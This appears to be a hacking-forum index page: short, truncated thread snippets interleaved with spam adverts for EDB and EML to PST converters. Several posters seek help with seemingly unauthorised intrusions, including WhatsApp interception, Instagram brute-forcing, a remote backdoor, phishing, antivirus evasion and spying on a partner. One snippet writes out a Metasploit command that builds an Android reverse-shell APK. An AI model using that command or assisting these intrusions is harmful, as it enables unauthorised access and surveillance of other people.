Just wondering so maybe I could increase my arsenal of pentesting tools with some new ones that are more uptodate and made by professional hackers.
I recently installed Kali as my main Operating System and ran into a problem. Whenever I do, apt-get update a error is returned:
I know everyone is tired seeing those how-to's on brute forcing instagram and other social media's. Sorry to break this to you but most of them are poorly engineered or do not work at all and claim's false results.
We need an easy way to transform . OST in . PST ? What is the easiest way to do this? I just need to work with e-mail now, and I don't have such an opportunity…
Sorry. It is Bruteforce again. If you saw my tutorial on getting Instagram accounts passwords, there were lots of complains that the script was no working well. Well, that was not my script, so I decided to make one myself instead.
NEW VERSION : https://Null-byte.wonderhowto.com/Forum/Hacking-Facebook-Twitter-Instagram-Account-Passwords-with-Bruteforce-0181808/
Hi guys I'm just wondering if anyone here knows of any possible ways to hack whatsapp? Like intercepting the messages going to another phone
EdbMails is a unique EDB to PST Exchange Server Recovery solution. It's an EDB to PST Conversion utility which facilitates granular / brick-level Exchange Server Recovery with EDB to PST Conversion. EDB to PST Converter repairs corrupt or damaged Exchange EDB files and restores the mailboxes into Outlook PST file. You can easily view Mailbox data from the PST files using MS Outlook application. It supports MS Exchange Server Recovery for 2003, 2007, 2010 and 2013 corrupt and unmounted database.
Hi all, need help. By mistake I had deleted all my pictures from SD cards. I don't have idea, how can I recover it? If any best way to recover entire my pictures, then please advise me.
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
So I tried getting into my Android device (phone & tablet but it still didn't work) I'll post here what I did:
EDB to PST Converter software user can efficiently recuperate damage EDB file as well as convert EDB to PST file in just few moments. It is compatible to recover from corrupt mailbox database and can export Exchange database into PST, PDF, MSG, EML and MBOX file formats.
I am conducting a simple exercise against a server and a client (both outside my network, and both are remote).
Use One of the best Regain EML to PST Converter which can easily convert EML file into PST format without losing any data and convert single as well as multiple EML file at a one time.It also convert Windows Live Mail, Outlook Express, Mozilla Thunderbird and Apple email and uses EML to PST file format.This software is well compatible with Outlook Outlook 97, 98, 2000, 2002, 2003, 2010, 2007 and 2013 and 2016.
Hey I received an email with the application in PDF file format. When I tried to open a PDF file , it shows error message that says : "format Error : not the correct PDF format or the file is corrupted" Then I tried to open mine .pdf to other tools for .pdf files but they again showed the same error message .
I opened a meterpreter session on my android phone and was able to run all the basic commands such as dumpcalllog and webcamlist etc... however when i try to access and/or change directories such as /Internal storage/DCIM/Camera using the 'cd' command i get a stdapi error, and i believe it is due to there being a space within the internal storage directory, but im not positive... is there a work around for this? ive looked up so many different pages to find this answer and i cannot seem to fi...
Hello everyone, this is my first post so play nice with me. We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes.
I did my recon (as suggested by most users around here, I just knew why it is really needed now) on a remote server, it is running a linux server with open ports (ssh, 80, etc), there are also ports that are opened by a node.js app, the node.js code looks like this: pastebin.com/QWikgNk7
hi guys. for download video from instagram without tools you only follow :
Forum Thread: When You Open the Archive, Winrar Displays: "Syntax Error in the Filename, Folder, Volume"
Does this mean that the 100% archive is broken and nothing can be dug out of it?
Hello, i have little problem in Metasploit. I can't get metasploit session. Metasploit is still listening. So i will tell you what i am doing.
Check out the below listed Top 5 Most Popular Hacking blogs Websites in 2018, the opportunities to learn hacking will never end. These websites are only a start to this fascinating adventure.
Hey everyone! I got my TP-LINK TL-WN722N wireless adapter installed on my Kali, and now i'm trying some WPA/WPA2-PSK crack with Aircrack-ng. The monitor mode worked ok with this commands:
hello GREys I researched top 3 hacking forums
Hello everyone. I need help cracking a NVR password,i have access to the router settings,i have access to the PC,i know how to connect to the nvr,i just dont know the password.Any idea how to get it.I was thinking about brute forcing it but i dont want to create too much noice on the network.Any help is greatly appreciated.
Im currently trying to set up a phishing attack by using the credential harvester, but when i try to clone the website it gets stuck on this...
There's lots of people in this world want to know how to hack wifi networks. You must search for CMD and run as administrator. But you need to trick your victim to connect his Wifi to your PC or Laptop. NOTICE: This for education only. Note: Even if the victim has logged you out from the Wifi long time ago you still can hack the password.
What I want? I wanna install a backdoor/rootkit on a remote server.
Hey everybody. So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.
Good day' to 'Anyone'. I'm from Philippines, and I am new here in the community. But recently, I already read some of the articles these fast few days regarding "Wi-Fi Hacking". Actually, I'd been saving and coping the articles I'm intersted for offline readings and as text files,. and I'm very grateful that I discover this site with these teachings.
I am unable to access my mail as I have lost the password of my DBX folder and not how to recover it back. Please give me some suggestion?
I know it's unethical, but you have no idea how this girl has fucked with my head. I love her and sincerely want her to be the person I thought she was, but I'm pretty sure she is poison and I need to move on. I hope she's right and I'm crazy and a horrible person and boyfriend for not trusting her, in which case I will apologize for wasting your time, donate $1,000 to any charity you want (including you directly if you choose, and admit that I am a complete asshole and a shitty person in gen...
Im trying to get a veil evasion pay load to run on a windows 10 machine. Im using a reverse tcp payload. The lhost is set to my public ip address and the lport set to 4444. It bypasses antivirus just fine but when i run metasploit and double click in windows on the payload it wont connect. The lhost for the reverse tcp payload in metasploit i set to my local ip and lport 4444. Please help.
Im trying to install kali nethunter in termux but the file isnt showing up any where. Heres what i did so far.
Hi i am trying to hack my home wifi to steal my password, i am new in the world of hacking networks, i have already tried evil twin attacks with fluxion and i found that it does disconnects only pcs not telephones, is there any solution or have i to change method of hacking? (I am trying now reaver and get Detected AP rate limiting) i am open to all kind of solutions, but i want to let you know that i am hacking using ubuntu because i had some problems with distributions like parrot os or kal...
Hi i have just installed metasploit on my phone using termux but i was thinking about two problems using it.